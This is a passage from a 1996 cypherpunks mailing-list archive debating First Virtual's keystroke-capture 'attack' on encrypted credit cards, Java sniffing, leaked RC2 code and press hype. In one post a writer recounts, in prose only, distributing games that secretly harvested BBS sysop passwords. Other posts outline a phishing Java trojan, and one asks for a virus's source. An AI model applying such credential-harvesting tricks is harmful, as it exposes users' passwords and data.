waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Fri, 2 Feb 1996 02:19:52 +0800
To: cypherpunks@toad.com
Subject: RC2 code on sci.crypt
Message-ID: <199601300312.VAA06064@parka>
MIME-Version: 1.0
Content-Type: text


For those not paying attention, there is RC2 code on sci.crypt.  RSADSI
is acting as if it is real, and will publish some legal posturing about
it real soon now.  

Bruce

**************************************************************************
* Bruce Schneier              APPLIED CRYPTOGRAPHY, 2nd EDITION is
* Counterpane Systems         available.  For info on a 15%
* schneier@counterpane.com    discount offer, send me e-mail.
**************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 2 Feb 1996 02:01:14 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <4ejdoq$ppt@jyusenkyou.cs.jhu.edu>
Message-ID: <gDwHiD102w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


arromdee@jyusenkyou.cs.jhu.edu (Ken Arromdee) writes:

> >Is it constitutionally protected in US to knowingly hurt other
> >people's feelings and to trample on graves?????
>
> Yes.  Free speech for the nonoffensive is not free speech at all.

A couple of years ago I'd probably howl about the hypocricy of one of
Serdar's chief censors daring to utter the words "free speech" in public,
but this time I simply laughed for a few minutes. Thanks, Ken.

ObCP: I've been encouraging the descandants of Serdar to make use
of cpunk remailers.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 2 Feb 1996 02:16:15 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <9601300015.AA15891@sulphur.osf.org>
Message-ID: <mRwHiD104w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz <rsalz@osf.org> writes:
> >There are many ways to spread it besides a virus.  Zillions of 'em.  And
>
> There are zillions (what, more than one thousand?) ways to get someone
> to run a random piece of software that will capture their keystrokes?
>
> I don't believe you.  Name six.

I think I'll go on a tangent:

Many, many, many years ago, when I was a little kid, I wrote several "cool"
games that I uploaded to various BBS's. The games kept track of high scores
and saved them in a file. At that time there were a few popular BBS programs
for PC DOS (Fido, PC Board, RBBS, et al) which stored their passwords in
fairly standard locations. When the games saved the high scores, they also
looked in these standard locations. Invariably, when I downloaded the same
games a few days later, I would discover that the BBS's sysops played the
game, and made the archive with their high scores available for downloading.

ObCrypto: the high scores were encrypted together with the shell passwords.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Fri, 2 Feb 1996 01:57:14 +0800
To: jwz@netscape.com (Jamie Zawinski)
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <310D9904.4487@netscape.com>
Message-ID: <199601300416.XAA23931@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> > >It's considerably more than that.  Please read on.
> > 
> > No, Nathaniel, it is not.  You watch keystrokes and record the ones you're
> > interested in.  This technique has interesting possibilities, but all your
> > PR screaming won't make it anything more than what it is.
> > 
> > How interesting are these possibilities?  It's hard to say.  
> 
> I'll bet they could get a patent on it...  There's probably some
> money to be made with that approach.

Oh, shit.  Don't give them any ideas ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Fri, 2 Feb 1996 02:19:42 +0800
To: Rich Salz <rsalz@osf.org>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <9601300015.AA15891@sulphur.osf.org>
Message-ID: <Pine.OSF.3.91.960129221928.14389B-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 29 Jan 1996, Rich Salz wrote:

> >There are many ways to spread it besides a virus.  Zillions of 'em.  And
> 
> There are zillions (what, more than one thousand?) ways to get someone
> to run a random piece of software that will capture their keystrokes?

Not wishing to get in the middle of this controversy, I have been 
wondering about the possibility of using a JAVA applet to do keyboard 
sniffing. As I am not familiar with this language, does anyone know if 
this would be possible?

Regards,
Tim Philp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 2 Feb 1996 01:16:43 +0800
To: cypherpunks@toad.com
Subject: short FV question
Message-ID: <Pine.SOL.3.91.960129224705.8055B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



When my CTS plays up like it has this past week, I use a Dragon dictate 
Voice Recognition system. Since I' Not actually touching a keyboard, does 
this make me secure?

Simon
----
RSA - The Canadian For Butt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 2 Feb 1996 01:59:49 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Java Sniffer (Was: Re: FV Announces That The Sky Is Falling)
In-Reply-To: <199601300335.WAA20456@dal1820.computek.net>
Message-ID: <199601300412.XAA23037@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

(sorry, no discussion of FV or pleasant coffee aromas in this message)

Tim Philp writes:
> I have been wondering about the possibility of using a JAVA applet to do 
> keyboard sniffing. As I am not familiar with this language, does anyone 
> know if this would be possible?

If you are running a broken or Trojan interpreter or class loader, then 
you're probably sunk regardless, because it can execute whatever deleterious 
code it wishes. 
(I say "probably" because I suppose you might have some separate watchdog 
program monitoring the actions of the interpreter. But ultimately that's just
part of an infinite regress: the watchdog could also be compromised, etc. ad
infinitum.)

The I/O class libraries don't offer calls anywhere near as deep as the
hardware keyboard interrupts. About all you can do is read a byte or a line
of input, as in any common programming language, but that's different than
surreptitiously reading bits when they are read as input by some other 
program. I don't see how you could build a keyboard sniffer in Java unless 
you could somehow trick the interpreter into feeding an input stream to an
additional process. 

Much more likely, IMHO, than a Java sniffer is a Java Trojan horse that pops 
up an innocuous dialog box and asks you to enter some sensitive piece of
information, then sends it off somewhere. About all it takes to write that is
a modicum of skill in user interface design. You could write it in any 
programming language, but in Java it may be particularly effective, since 
people may come to expect to be prompted for sensitive info over the net by 
Java apps. Maybe the Java folks who just left Sun decided to seize the
opportunity ;>

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQ2afinaAKQPVHDZAQFfkAf/SKDoP6D8BvbBPBScMTS5t51k6n4uI9KJ
AcmIFxheQzpWcJd0qh1Vo2OClHmgWWUbekWsNcC9vfWPMqcQTju+DFc+/ncbg7PQ
F4dTgRm2pIVs70lsTd8hFaAauAagqmuEzyhYXv3XGT/gdMuSOJ/z84cp/yK0VpdQ
N0UpsONTjarx9DIvun14x8UU77SqXgvOz0F/n309TiLkVYSNBsUzk7ub6hdk4Q1a
ay/8rP6m7ZqpFTWXKGmPjUne7gfX0VmJPcePB5d9hr585e/0oCgCWHg40kfUJnOs
MRrj7ot86yGEVEdR3ykmEo5XoFD1WxuvXpdDq5EwR3QvtNyTfMh/Ew==
=1j5R
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andreas@horten.artcom.de (Andreas Bogk)
Date: Thu, 1 Feb 1996 15:01:47 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: Authentication of crypto clients
In-Reply-To: <Pine.SUN.3.91.960129160857.27262A-100000@infinity.c2.org>
Message-ID: <y8aviluxq4k.fsf@horten.artcom.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Raph" == Raph Levien <raph@c2.org> writes:

    Raph> The issue is: how does the crypto provider authenticate the
    Raph> client?

If you consider the client to be untrusted software, I'm afraid the
answer is probably not at all.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMQ2eeUyjTSyISdw9AQG6RgP+KNg7GbFVvs+L2AxmyWL6rsBBZ8lB7gX9
ZrK7Xros5SclXVmxqIPdlJsl6KqzrTCkk21ZzDsAtbvRCPdaEHouQ2l5tPqMr3BY
OQYpL7+hQmq9KHuh6VT8YLYn3JqMMcPevOb922wd2WpC2VlyjrPDY31sEwRizj2q
39UgEI/XMZE=
=zaAv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Fri, 2 Feb 1996 04:29:37 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: CONTEST:  Name That Program!
In-Reply-To: <sl3GafqMc50eQWYD0N@nsb.fv.com>
Message-ID: <199601301030.FAA03072@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <sl3GafqMc50eQWYD0N@nsb.fv.com> Nathaniel Borenstein <nsb@nsb.fv.com> writes:

> As you may have read in my previous message, First Virtual has developed
> and demonstrated a program that completely undermines all known schemes
> for using software-encrypted credit cards on the Internet.  More details
> are avialable at http://www.fv.com/ccdanger.

You are a liar.

Your program does not undermine all known schemes for transmitting
software-encrypted credit cards on the internet.  You have no way of
obtaining my credit card number, because I will not run your software.
Furthermore, because I use a Unix-like operating system (specifically
OpenBSD) which I re-build from source code every week or so, you would
need to hack my compiler to keep mis-compiling itself and compromise
my kernel or netstat, ps, etc, for which you would need to be root.

The first virtual protocol seems to have some real weeknesses.
However, I do not feel like wading through all the pages of text to
figure out what is going on.  I challenge you to post a concise
description of the protocol, using syntax such as:

  A -> B:  {ID, xxx, ...}_Ks

With short descriptions where necessary.  If you do, I'm sure we can
rip your protocol to shreds (which is why you won't).

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Thu, 1 Feb 1996 00:54:05 +0800
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <ad32cd9601021004af4e@[132.162.233.188]>
Message-ID: <cl3UCcCMc50eFIr0w7@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. Jonathan
Rochkind@cs.obe (3157*)

> 1) I remember Mr. Borenstein saying a year or two ago, something like "We
> have nothing against encryption; we're just using a non-encrypting
> technique for the moment, becuase it can be quickly, easily, and safely
> deployed by us. Eventually,  we'll probably use encryption."    Apparently,
> this propaganda piece marks a change of strategy.

No, what it marks is a growing understanding.  When I said that, over a
year ago, I still thought that software encryption of credit card
numbers could be a workable solution.  I no longer do, based primarily
on my very recent realization that we could mount a multi-stage fully
automated attack on such systems.

> 3)  I believe that FV works by assigning the user some sort of id number.
> They send the id accross the net, FV has a database with "FV-ID" <->
> credit-card-number correspondences, the merchant sends FV the id, FV bills
> your card and pays the merchant.  Now, if I'm correct about how FV works,
> we could clearly write a program that searches your HD for FVs data files,
> extracts your FV-ID from it, and steals it.  It could be a virus, it could
> send the FV accross the net, whatever.  We could then use your FV-ID to
> make fraudulently make purchases through the FV system that would be billed
> to you.  This is essentially the same attack as FV "demonstrates" against
> software encrypted credit cards over the net: that is, the "You have an
> insecure system and if we can put evil software on it, we can get you."
> attack.

This is wrong on two main counts:  the ID's are harder to find than
credit cards, and they're not as directly useful as credit cards.  These
two facts combine to make the attack more or less irrelevant to FV.

First of all, the Virtual PIN (FV-ID) is much harder to extract from a
large data stream because it is arbitrary text, unlike credit card
numbers, which are self-identifying.

Second, a Virtual PIN is not a one-way payment instrument, like a credit
card.  To use FV to buy something on your credit card, you need to
combine the theft of a Virtual PIN with the compromise of the buyer's
email account, for confirming transactions.  We all know this can be
done -- we actually even spell out how to do it in our paper, "Perils
and Pitfalls of Practical CyberCommerce" -- but it is very hard to
combine these steps on the large scale that would be needed to mount an
automated attack, which is the most serious threat to the credit card
system.

> True, we wouldn't have your credit card number, and we couldn't order stuff
> from LL Bean billed to you.  We could just order stuff from FV merchants.
> So maybe it's marginally better.  Maybe.  But I can't see any way FV could
> be immune to an attack of this sort.  I believe that all they do is give
> you a first virtual ID number sent accross the net (in the clear!) in lieu
> of your card number.      With an insecure PC as an assuption (and it is
> probably a good one, actually), I can't see how FV could be immune from an
> attack of this sort.   If Mr. Borenstein or anyone else thinks it is,
> please explain how.

I hope that I jut did.  My guess is that you didn't understand the email
confirmation that is required for every purchase in the FV system.  For
more information, please see our web pages at http://www.fv.com.  --
Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Thu, 1 Feb 1996 00:52:11 +0800
To: cypherpunks <dvw@hamachi.epr.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credi t Cards
In-Reply-To: <310D4CCE@hamachi>
Message-ID: <Ql3UHiOMc50e5Ir1sa@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 RE: FV Demonstrates Fatal F.. David Van
Wie@hamachi.ep (764)

>  Using stolen credit card numbers is a risky business, and the ability of   
> the credit card companies in detecting fraud and locating criminals is   
> quite real.

And most of the fraud detection is premised on the fact that once a
criminal steals a card number, he'll use it several times.  That's why
an automated attack of the kind we've outlined is so dangerous -- a
clever criminal will use each stolen number only once, thus making
himself far harder to trace.

> Of course, since Federal law requires the credit card companies, not the   
> user, to pay the costs of fraud, First Virtual's entire premise is a red   
> herring.  If the credit card companies are willing to take the risk, they   
> will (and are).

Actually, you're wrong here too.  It is the banks, not the credit card
companies, that carry the risk.  If, for example, Visa defines a
standard for encrypted credit card numbers, and it turns out to be
fatally flawed, it is the banks that will lose their shirts.  This may
not seem like an important distinction to you, but I assure you that it
is important to bankers.

> Scare tactics are nothing new in the PR business, but I would recommend   
> that the principals at FV learn about "cutouts" for this type of   
> gimmickry if they wish to preserve their reputations....

My reputation in the technical community, I assume, will stand or fall
based on the validity of my technical claims, not on the knee-jerk
reactions of people who don't even read the announcement thoroughly
enough to understand the technique we have revealed.  I have not yet
heard anything that makes me think that my claim is untrue.  We have
revealed the first known strategy for an Internet-based large-scale
automated attack on the credit card system.  I think that's a real
threat.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Thu, 1 Feb 1996 08:55:51 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Message-ID: <Pine.BSD/.3.91.960130094017.9580A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein <nsb@nsb.fv.com> wrote:
>> Programs needing secure entry create a "secure entry field" which is
>> really just an imagemap with the digits (and alphas if required) placed
>> randomly about.  The user then uses the mouse to click on these numerals.
>> Ideally the graphics that represent the numerals would be drawn from a
>> random pool and are misformed to thwart any OCR attempts. The graphics 
could
>> be made even more difficult to OCR by mixing in words and pictures to
>> represent the numbers. 
>If any particular program for doing this came into widespread use, we
>could engineer an attack, similar to our keystroke attack, based on the
> specific properties of the approach used.

You could try but I don't think you would succeed.  I have problems doing 
OCR on faxes with a top of the line OCR program.  Don't tell me your 
trojan horse is going to be able to OCR images that are designed to be 
hard to OCR.

Here is an example of an imagemap for secure number entry.

http://www.l0pht.com/~weld/numbers.html

Since this is inherently a visual thing, I thought I would cook up a 
graphic on the web siince you cannot do this via email easily.

      Weld Pond   -  weld@l0pht.com      -     http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s         
      Technical archives for the people  -  Bio/Electro/Crypto/Radio

      L0pht Open House 2/3/96 at 8:00pm - Live on irc #l0pht - write
      root@l0pht.com for details.

	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Thu, 1 Feb 1996 04:16:19 +0800
To: jya@pipeline.com
Subject: Re:  NRO Slush Fund
Message-ID: <9601301925.AA04344@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>Spy Agency Said to Have Spare Billions

Sad to think that the undersecretary for defense who used to have
oversight of the NRO is now the Secretary of Defense.

One would guess he is trying not to pick up any bricks right now




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Thu, 1 Feb 1996 06:02:04 +0800
To: cypherpunks@toad.com
Subject: KOH "Helpful" Crypto Virus
Message-ID: <Pine.LNX.3.91.960130131704.286A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for more information on the KOH Virus, a 'helpful' virus which
kindly asks to infect your system and encrypt all of your data. It spreads
to floppies (upon request) and to other systems, encrypting all files. 

I read about it in Boardwatch magazine, which surprisingly states that the
U.S. government forbids the distribution of all cryptographic programs in
binary form; source code can be freely distributed.

Please point me towards the source/binary, or further information. 

(define(RSA m e n)(list->string(u(r(s(string->list m))e n))))(define(u a)(if(>
a 0)(cons(integer->char(modulo a 256))(u(quotient a 256)))'()))(define(s a)(if
(null? a)0(+(char->integer(car a))(* 256(s(cdr a))))))(define(r a x n)(cond((=
0 x)1)((even? x)(modulo(expt(r a(/ x 2)n)2)n))(#t(modulo(* a(r a(1- x)n))n))))

           "SGI and Linux both run Motif and X11.  They both compile c++
                cleanly (using gnu g++). They're the same!"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Feb 1996 06:08:25 +0800
To: cypherpunks@toad.com
Subject: Re: The FV Problem = A Press Problem
Message-ID: <ad33b5f134021004e5fb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:42 PM 1/30/96, Jonathan Rochkind wrote:

>I'd say _all_ news, not just software news, is P.R. controlled, these days.
>You can largely hold Edward L. Bernays, the "father of public relations"
>(who just died last year) responsible for that--or the societal conditions
>that allowed Bernays to do his thing.  Bernays developed expertise in
>"engineering of consent" turned the news into a commercialized and

Interesting term, similar to Chomsky's "Manufacturing Consent" (which
obviously must've come later...).

>Now, the news you read is manufactured in press releases to sell a product,
>and is there because a well written press release convinced a reporter or
>editor that a marketting ploy was actually a newsworthy event (or, perhaps,
>because the advertising dollars that went along with the press release
>convinced him).  Witness FVs demonstration of key capture becoming a
>newsworthy event.

Maybe I've from the old school, the school that says one should be more
modest, objective, and circumspect. Then, if it's really news, and not just
a PR scam, the journalists will come.

(Understand that I'm not saying I'm sort sort of paragon of modesty. Far
from it. But I try to control myself.)

I think that the view that "all news is hype" is overly harsh. In fact,
corrective forces tend to slow this headlong rush into P.R. For example,
the reaction here to the Nathaniel Borenstein/First Virtual hyperbole, and
the fatuous, credulous article by Simson Garfinkel (sorry, Simson, but I
call 'em as I see 'em), will undermine their credibility for a long time.
Crying wolf, and all that.

The FV "discovery" that insecure machines can cause all sorts of problems
rated at most a brief paragraph in the papers, not the full-page treatment
Garfinkel and his editors gave it in the "San Jose Mercury News" (and maybe
other papers that picked it up, or will in the next few weeks).

Newspapers and magazines that run "fluff" pieces, taken almost directly
from press releases, lose credibility. (Nathaniel B. claims that the Simson
G. piece ran _first_, before his Press Release. Well, how did Simson first
learn of the FV "discovery"? How did the FV President arrange to be
photographed? It seems pretty clear to me that FV was involved in the
development of the story, perhaps even planting the seed for it. Not
necessarily a dishonest thing to do, of course, just a bit tacky given that
the "discovery" is not news.

>If you want to effect what's in the media, maybe you should learn how to
>issue press releases.

Nope. I think it a very poor model for getting information out. With all
due respect to Sameer, who has done many fine things, I gag every time I
see a press release from Community Connection in which Sameer interviews
himself.

Or, put another way:

[Embargoed for release until Jan. 30, noon PST]

Crypto Anarchy Foundation Releases Views on Self-Interview Press Releases

Corralitos, CA. The Crypto Anarchy Foundation, the world's leading think
tank on crypto anarchy, today is announcing its views on press releases.
According to Crypto Anarchy Foundation founder and President, Timothy C.
May," "We think these press releases are a phony means of pumping up a
story." When asked for more details, he added: "The self-interviews are
really tacky. Can't you ask me some better questions?"

The Crypto Anarchy Foundation, the world's foremost provider of information
about crypto-mediated anarcho-capitalism, may be reached at 408-728-0152.
CAF spokesperson Tim May can arrange interviews with CAF founder Tim May.


--Tim May, CAF founder, chief technical officer, and media relations specialist

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Thu, 1 Feb 1996 01:56:01 +0800
To: cypherpunks@toad.com
Subject: Re: The FV Problem = A Press Problem
Message-ID: <v02120d05ad33ee7941eb@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 1:28 PM 1/30/96, Timothy C. May wrote:

>>I'd say _all_ news, not just software news, is P.R. controlled, these days.
>>You can largely hold Edward L. Bernays, the "father of public relations"
>>(who just died last year) responsible for that--or the societal conditions
>>that allowed Bernays to do his thing.  Bernays developed expertise in
>>"engineering of consent" turned the news into a commercialized and
>
>Interesting term, similar to Chomsky's "Manufacturing Consent" (which
>obviously must've come later...).

        Chomsky took the phrase from a book by Walter Lippman, published I
think in 1922; the book's name escapes me now.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Thu, 1 Feb 1996 03:01:38 +0800
To: cypherpunks@toad.com
Subject: from http://www.fv.com
Message-ID: <m0thOCT-0005PiC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



Far be it from me to add to this, but this is from FV's
own website:

[begin quote]

[2] Why don't you use encryption with First Virtual?
 
Encryption is almost always cumbersome and difficult.  And it always
adds an additional step, and something else to worry about.  After all,
even banks and armored cars are subject to robbery attempts, and
sometimes those attempts succeed.  Rather than use encryption, we
decided to design a system in which it wouldn't be necessary.

[end quote]

I, uh, think that speaks for itself.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Thu, 1 Feb 1996 09:09:31 +0800
To: cypherpunks@toad.com
Subject: re: alleged RC2
Message-ID: <9601302334.AA15942@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Not like I have the time or anything, but is there any value in
attempting something like "bruterc2"?

(IANARC (I am not a real cryptographer), but it looks like one trick
to that would be to somehow short-circuit the key setup stage.  I
suppose you could just start after it's mapped the user key into the
"xkey" array, but I might be missing something.)


______c_____________________________________________________________________
Mike M Nally * Tivoli Systems * Austin TX   * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Graham <pg@viaweb.com>
Date: Thu, 1 Feb 1996 21:39:24 +0800
To: watson@tds.com
Subject: Re: your bogus post
Message-ID: <199601302249.RAA06492@tintin.uun.org>
MIME-Version: 1.0
Content-Type: text/plain


  marketing works, and companies have to use it to stay profitable.

I would not mind if fv made bogus claims in their press releases.  
People expect that in press releases.  But I think that they should 
keep their press releases on their web site, where we can ignore them, 
instead of disguising them as "discoveries" in netnews.

  So, what do you think of their product?

No client or potential client of our online mall has ever asked us
to implement fv payment.  Everyone seems happy with credit cards.

I think that the people at fv could see what was happening, and this
ill-considered post was a desparate attempt to make everyone take fv
seriously.  In my case it had the opposite effect.

-- pg




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 1 Feb 1996 09:18:15 +0800
To: cypherpunks@toad.com
Subject: Re: The FV Problem = A Press Problem
Message-ID: <ad33f7b337021004597f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 AM 1/31/96, sameer wrote:
>        I agree with your points that the press should write real
>articles, and not just swallow press releases. The fact of the matter
>though, is that that's what they do, swallow press releases. It's a
>said state of affairs, but that is the state of affairs.
>        I wouldn't say *all* news is PR controlled, but most of it
>is. It's much less work for the reporter when an article just shows up
>on their desk and all they have to do is call one or two people for
>some fresh quotes.

And I agree with your points, too, Sameer. Like I said, I mean no
disrespect to you that you issue press releases in which you interview
yourself...it's the form that press releases take, and it's the form that
"slides down easily" into a newspaper story. (The form makes it look as
though the journalist has conducted the interview and gotten the quotes.)

And at least most of Community Connexion's press releases have been about
new services being offered, or rewards, etc. And not given vastly more
attention than they deserve (as was the case with the FV "discovery").

I really hope this media frenzy with all things related to the Internet
will burn itself out.

--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Fri, 2 Feb 1996 01:16:30 +0800
To: merriman@arn.net (David K. Merriman)
Subject: Re: Lotus, NSA sing in same key
In-Reply-To: <2.2.32.19960123150421.0067c0c0@arn.net>
Message-ID: <199601300655.RAA08590@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello cypherpunks@toad.com
  and "David K. Merriman" <merriman@arn.net>
 
DKM wrote [reformatted]:
> Article of that title in Jan 22 issue of EE Times:
...
> the encrypted data. Foreign hackers will find the encrypted messages as
> difficult to decrypt as a message with a 64-bit RSA key,
...                                        ^^^^^^^^^^^^^^
                                           ^^^^^^^^^^^^^^
Wow!


Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@cs.cmu.edu>
Date: Thu, 1 Feb 1996 21:43:29 +0800
To: cypherpunks@toad.com
Subject: Re: Apology and clarification
In-Reply-To: <+cmu.andrew.internet.cyclists+0l3TCU200UfA00z5cl@andrew.cmu.edu>
Message-ID: <DM0o6t.n0K.1@cs.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


In a nutshell: FUD Virtual's press release glosses over the hard part
of the attack -- distribution and collection.  Yes, the credit-card
system is broken as designed, but that's already reflected in its cost
structure.  The proposed attack will never make up a significant
fraction of credit-card fraud.

You know, FV should put out a press release warning that all
encryption-based payment systems are insecure, due to the threat of
the proposed "Chinese-lottery virus".  Bet you could get the Times to
print it...

In article <+cmu.andrew.internet.cyclists+0l3TCU200UfA00z5cl@andrew.cmu.edu>,
Nathaniel Borenstein  <nsb@nsb.fv.com> wrote:
>When you put all four of these together, you have an attack that IS new,
>in the sense that nobody we know of has ever mentioned it before,

Who would bother?  Ask yourself if you'd have been quite so excited
about this "new attack" if you were just Nat Borenstein, private
citizen, with no financial interest in a competing technology.

>and which could in fact be used by a single criminal, with only a few
>weeks of programming, to tracelessly steal MILLIONS of credit cards,
>if software-encrypted credit-card schemes ever caught on.

You wave your hands and say that "consumer machines are insecure", but
I don't think you have any conception of what it would take to get
your trojan onto "MILLIONS" of machines.  There is no historical
precedent for such an attack (no, Ping-Pong and Stoned don't make the
cut).  Your suggestions of such things as rogue GIF viewers aren't
even in the ballpark.  What fraction of the victims will expose their
credit card numbers?  what fraction will notice your trojan and warn
against it?  The ratio has to be very, very large.

>and get them back to the program's author by non-traceable
>mechanisms.

I didn't see the part where you explain how this works, either.

>If not, I think it's worth noting that this fact was previously
>completely unknown to the bankers and businessmen who are putting
>large sums of money at risk on the net.  The only way to get the
>message to those communities is with a very visible public
>announcement of the kind you saw yesterday.

You wouldn't have shot your reputation so badly if you weren't so
damned disingenuous about the whole thing.  Paragraphs like the above
really irritate me.

--
   Eli Brandt
   eli+@cs.cmu.edu




